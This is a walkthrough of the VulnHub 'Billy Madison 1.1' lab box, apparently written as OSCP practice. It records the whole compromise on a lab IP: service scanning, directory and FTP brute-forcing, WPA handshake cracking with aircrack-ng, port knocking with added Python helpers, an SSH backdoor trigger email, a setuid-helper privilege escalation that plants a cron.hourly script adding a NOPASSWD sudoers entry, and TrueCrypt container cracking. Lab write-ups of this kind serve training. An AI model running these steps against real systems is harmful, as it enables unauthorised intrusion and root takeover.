OSCP - vulnhub BILLY MADISON: 1.1 box walkthrough

This post just records my OSCP lab practice.

Billy Madison: 1.1 ~ VulnHub

After downloading the VM, switch it to bridged networking and import it into VMware.

Once kali and the target are both up, nmap scan 192.168.165.0/24

The target's IP turns out to be 192.168.165.156


 hping3


nmap


First run an SSH weak-password brute force, though it turns out to be useless


ncat -v 192.168.165.156 23

That returns some information


It gives a password, rkfpuzrahngvat, and the encoding used: ROT

I picked a random online decoder (CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码)

ROT13 gives exschmenuating
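The hint only said "ROT", not which shift, so an offline brute force over all 25 shifts is the more reliable move than guessing ROT13 on a website. This is an added example, not code from the original post; the English-likeness score is a crude heuristic of my own and only orders the list, it does not decide anything.

```python
import string

def rot(text, shift):
    """Shift every ASCII letter by `shift` positions; everything else passes through."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)

def rot_candidates(ciphertext):
    """Every non-identity shift: when the hint only says 'ROT', try all 25."""
    return {n: rot(ciphertext, n) for n in range(1, 26)}

# Crude English-likeness score: share of letters that are among the most common
# English letters. It pushes real words towards the top of the list but proves
# nothing, so still eyeball the whole list (assumption: plaintext is English).
COMMON = set("etaoinshrdlu")

def english_score(text):
    letters = [c for c in text.lower() if c in string.ascii_lowercase]
    return sum(c in COMMON for c in letters) / len(letters) if letters else 0.0

def ranked_candidates(ciphertext):
    """(shift, plaintext) pairs, most English-looking first."""
    return sorted(rot_candidates(ciphertext).items(),
                  key=lambda kv: english_score(kv[1]), reverse=True)

if __name__ == "__main__":
    for n, pt in ranked_candidates("rkfpuzrahngvat"):
        print(f"ROT{n:<2} {pt}")
```

Run it with the telnet banner's string and ROT13 shows up as exschmenuating in the list; the same function with a shift of 13 maps it back, since 13 + 13 = 26.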

Opened 192.168.165.156:69 in the browser for the WordPress site, but it doesn't load, which is a bit odd

 

That doesn't stop us from running wpscan against it


It finds one user: admin

Open 192.168.165.156:80 in the browser

Nothing useful; Billy is probably one of the usernames on the box

Run dirb and see what turns up


Looked through the results and found nothing good; the de, da and so on underneath are just the same page in different languages

There are also 139 and 445, Samba


We can connect to the EricsSecretStuff share


Basic smbclient usage

 get xxxxx              ; download a file
 put xxxxx              ; upload a file
 mget *                 ; download every file in the current directory
 tar c test.tar notes/  ; pack everything under the notes directory into test.tar

Try uploading a file to the share


Not allowed. Try downloading instead


It tells us there is a backdoor

At this point only port 2525 seems to be left


I was out of ideas here, so I looked at some foreign writeups

Turns out the exschmenuating from earlier is a directory

A new page with one piece of information: veronica uses part of her name as her filename. That immediately made me think of rockyou.txt. Looking at the log, I found my IP had been banned, apparently for connecting to port 23


grep -i veronica /usr/share/wordlists/rockyou.txt > /home/kali/Desktop/111.txt

Use grep to pull every rockyou entry containing veronica into a wordlist, then brute-force the directory with dirb


Found it. Download the capture and open it in Wireshark

6 emails in total, all sent to port 2525

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: [email protected]
From: [email protected]
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT


EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

https://www.youtube.com/watch?v=z5YU7JwVy7s

-VV


.
QUIT


EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT
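Wireshark's "Follow TCP Stream" is fine for six messages, but the same job is easier to repeat from a script once a capture has dozens of sessions. This is an added example, not from the original post: it takes a reassembled client-side SMTP stream (the text you get from following the stream, RFC 5321 envelope plus RFC 5322 headers and a dot-terminated body), splits it into messages, and pulls out quoted credentials and URLs. The sample stream below is constructed to mirror the capture above; the example.com addresses are placeholders. Note that the password is captured exactly as quoted in the message, trailing period included.

```python
import re
from email import message_from_string

# Constructed sample: a reassembled client-side SMTP stream shaped like the one
# recovered from Veronica's capture. Addresses are placeholders.
SAMPLE_STREAM = """\
EHLO kali
MAIL FROM:<eric@example.com>
RCPT TO:<veronica@example.com>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: veronica@example.com
From: eric@example.com
Subject: VIRUS ALERT!

Hey Veronica,

Just click here to install it, k?
.
QUIT
EHLO kali
MAIL FROM:<veronica@example.com>
RCPT TO:<eric@example.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@example.com
From: veronica@example.com
Subject: RE: VIRUS ALERT!

We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

https://www.youtube.com/watch?v=z5YU7JwVy7s
.
QUIT
EHLO kali
MAIL FROM:<eric@example.com>
RCPT TO:<veronica@example.com>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: veronica@example.com
From: eric@example.com
Subject: RE[2]: VIRUS ALERT!

Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."
.
QUIT
"""

def _arg(line):
    """'MAIL FROM:<a@b>' -> 'a@b'"""
    return line.split(":", 1)[1].strip().strip("<>")

def parse_smtp_stream(stream):
    """Split a reassembled SMTP client stream into messages.

    Each DATA section runs from the line after DATA up to the lone '.' line
    (RFC 5321 end-of-data). The envelope (MAIL FROM / RCPT TO) is kept apart from
    the RFC 5322 headers inside DATA, because the two need not agree.
    """
    messages, envelope = [], {"mail_from": None, "rcpt_to": []}
    lines = stream.splitlines()
    i = 0
    while i < len(lines):
        cmd = lines[i].strip().upper()
        if cmd.startswith("MAIL FROM:"):
            envelope["mail_from"] = _arg(lines[i])
        elif cmd.startswith("RCPT TO:"):
            envelope["rcpt_to"].append(_arg(lines[i]))
        elif cmd == "DATA":
            body = []
            i += 1
            while i < len(lines) and lines[i] != ".":
                # Undo dot-stuffing: a line starting with ".." carried a literal "."
                body.append(lines[i][1:] if lines[i].startswith("..") else lines[i])
                i += 1
            msg = message_from_string("\n".join(body))
            messages.append({"envelope": envelope,
                             "headers": dict(msg.items()),
                             "body": msg.get_payload()})
            envelope = {"mail_from": None, "rcpt_to": []}
        i += 1
    return messages

# Quoted "user ... password" pairs; the quotes are taken literally, so a period
# inside them is part of the credential.
CRED_RE = re.compile(r'user(?:name)?\W+(?:of\s+)?"([^"]+)"[^"]*?password\W+"([^"]+)"', re.I | re.S)
URL_RE = re.compile(r'https?://\S+')

def find_credentials(messages):
    return [pair for m in messages for pair in CRED_RE.findall(m["body"])]

def find_urls(messages):
    return [u for m in messages for u in URL_RE.findall(m["body"])]

def summarize(messages):
    """(Date, From, Subject) per message, in capture order."""
    h = lambda m, k: m["headers"].get(k)
    return [(h(m, "Date"), h(m, "From"), h(m, "Subject")) for m in messages]

if __name__ == "__main__":
    msgs = parse_smtp_stream(SAMPLE_STREAM)
    for row in summarize(msgs):
        print(row)
    print("credentials:", find_credentials(msgs))
    print("urls:", find_urls(msgs))
```

To use it on the real capture, follow the TCP stream in Wireshark, save the client-to-server direction as text, and pass that text to parse_smtp_stream.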
 

From the conversation: eric tricked Veronica into downloading a virus, and there is also an FTP server that stays off unless someone connects with the "Spanish Armada" combo (???). The account is eric with password ericdoesntdrinkhisownpee.

Open https://www.youtube.com/watch?v=z5YU7JwVy7s and start the English listening exercise

Roughly: 1066 1215 Spanish Armada 1466 67 1469 1514 1981 1986 Please do not do that

Knock the ports from a shell loop

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 192.168.165.156; done
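The nmap loop works because --max-retries 0 sends exactly one SYN per port. The same knock in plain sockets, added here as an example that is not part of the original post, makes that requirement explicit and then polls the port that is supposed to open; the target address is the one from this box, the sequence is the one read off the video.

```python
import socket
import time

def knock(host, sequence, timeout=0.3, gap=0.2):
    """Send a single SYN to each port of `sequence`, in order.

    A plain connect attempt is enough: the knock daemon only looks at the SYN, so
    "connection refused" is the expected result on every (closed) knock port. The
    short timeout matters on filtered ports, because Linux retransmits an
    unanswered SYN after about a second, and a duplicate knock can reset the
    daemon's idea of where you are in the sequence.
    """
    sent = []
    for port in sequence:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect_ex((host, port))  # result deliberately ignored
        sent.append(port)
        time.sleep(gap)
    return sent

def port_open(host, port, timeout=1.0):
    """True if a full TCP handshake with host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

def knock_and_wait(host, sequence, target_port, attempts=10, delay=1.0):
    """Knock, then poll the target port until it answers or we give up."""
    knock(host, sequence)
    for _ in range(attempts):
        if port_open(host, target_port):
            return True
        time.sleep(delay)
    return False

def open_listener(host="127.0.0.1"):
    """Throwaway listener on an ephemeral port, for trying the poller against yourself."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)
    return srv, srv.getsockname()[1]

# The "Spanish Armada" sequence from the video hint; the port it opens is FTP (21).
SPANISH_ARMADA = [1466, 67, 1469, 1514, 1981, 1986]

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.165.156"
    print("ftp open after knock:", knock_and_wait(target, SPANISH_ARMADA, 21))
```

If the port never opens, the usual causes are a knock that arrived twice (retransmit), knocks sent too fast for the daemon, or a previous, wrong knock that has to time out first; rebooting the box also resets it, as noted at the end of this post.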

Port 21 is now open and accepts connections. Logging in with the earlier credentials had problems; after a Baidu search I found that typing passive makes it work normally


get .notes downloads it; opened, it reads as follows. The other files I downloaded I couldn't quite make sense of

Ugh, this is frustrating.  I managed to make a system account for myself. I also managed to hide Billy's paper where he'll never find it.  However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working.  One sort of worked, but I think I have it installed all backwards. If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  All I need to do is send an email that includes the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to check Veronica's.

-EG

In short, we need a wifi password. We checked Billy's FTP and it isn't there, so it must be in Veronica's FTP

From the video, the blanks are "My kid will be a Soccer Player", and an email has to be sent, which should open a new SSH port

Recalling the earlier hint that Veronica uses her name as part of her password, brute-force Veronica's FTP account

After logging in there are two files: eg-01.cap and email-from-billy.eml

email-from-billy.eml reads:

Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.

I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,
Billy

Looks like Billy and Eric are both lovely people. No wifi password in here

Then I remembered Aircrack-ng, which I had used before

The cap file's name looks just like a captured handshake, so it's worth trying to crack. This kind of cracking is fast, so I just fed it rockyou.txt directly

aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt


It cracked right away: wifi name EricGordon, password triscuit*

Then I tried an anonymous login and got the following; for anonymous login any email address works as the password


Connect to port 2525 on the target and send an email in the same format as the ones captured in the cap file, with the content changed to

My kid will be a soccer player

Send it, then rescan: the target has opened a new port. The session looks like this:

<-  220 BM ESMTP SubEthaSMTP null
 -> EHLO kali
<-  250-BM
<-  250-8BITMIME
<-  250-AUTH LOGIN
<-  250 Ok
 -> MAIL FROM:
<-  250 Ok
 -> RCPT TO:
<-  250 Ok
 -> DATA
<-  354 End data with .
 -> Date: Thu, 15 Sep 2016 07:57:56 -0400
 -> To: [email protected]
 -> From: [email protected]
 -> Subject: My kid will be a soccer player
 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
 ->
 -> My kid will be a soccer player
 ->
 -> .
<-  250 Ok
 -> QUIT
<-  221 Bye
=== Connection closed with remote host.

Or, equivalently, in one swaks command

swaks --to [email protected] --from [email protected] --server 192.168.165.156:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

Rescanning shows port 1974 open, running OpenSSH 7.2p2


searchsploit it: seemingly only the username enumeration is usable


Successfully connected as eric over SSH; now for privilege escalation


find / -user root -perm -4000 -ls 2>/dev/null

/usr/local/share/sgml/donpcgd is setuid root and looks like it can create a file at any path


eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/test
#### mknod(/etc/testing,21b6,103)
eric@BM:~$ ls -lah /etc/test
crw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/test
eric@BM:~$ touch /tmp/test
eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
#### mknod(/etc/cron.hourly/test,81b4,0)
eric@BM:~$ echo -e '#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
eric@BM:~$ chmod +x /etc/cron.hourly/test
eric@BM:~$ cat /etc/cron.hourly/test
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Wait up to an hour for cron.hourly to run it, then sudo su. One caveat: cron.hourly is executed through run-parts, which only runs files whose names consist of letters, digits, underscores and hyphens, so a name like test works but test.sh would be skipped silently.


Root obtained

But we still need to find Billy's lost file

In the end, something useful turned up in the /PRIVATE folder at the filesystem root


We are asked to use cewl to generate a wordlist from the Wikipedia entry


Normally it can't be generated at all without a proxy; proxychains is recommended

proxychains cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison


With the proxy on, the wordlist is generated successfully

Next, cracking the container needs truecrack, which can be installed directly on kali

truecrack -w billy-wiki.list -t BowelMovement


After the password is recovered, veracrypt has to be installed to open the container

openSUSE Software: for installing on kali I'd recommend following that article, or just use the commands below directly

echo 'deb http://download.opensuse.org/repositories/home:/stevenpusser:/veracrypt/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/home:stevenpusser:veracrypt.list
curl -fsSL https://download.opensuse.org/repositories/home:stevenpusser:veracrypt/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/home_stevenpusser_veracrypt.gpg > /dev/null
sudo apt update
sudo apt install veracrypt

You must create the mount-point folder first and then run the command; inside is a zip file, which has to be unzipped one more time to get the two files.

mkdir billy
veracrypt -tc BowelMovement billy


After unzipping, we get the two files


That's the end. I have to say it was fun and broadened my thinking; a very good box, and I learned a lot of commands. The most annoying part was ports 21 and 1974: after rebooting the box I had to run the commands again before they would open
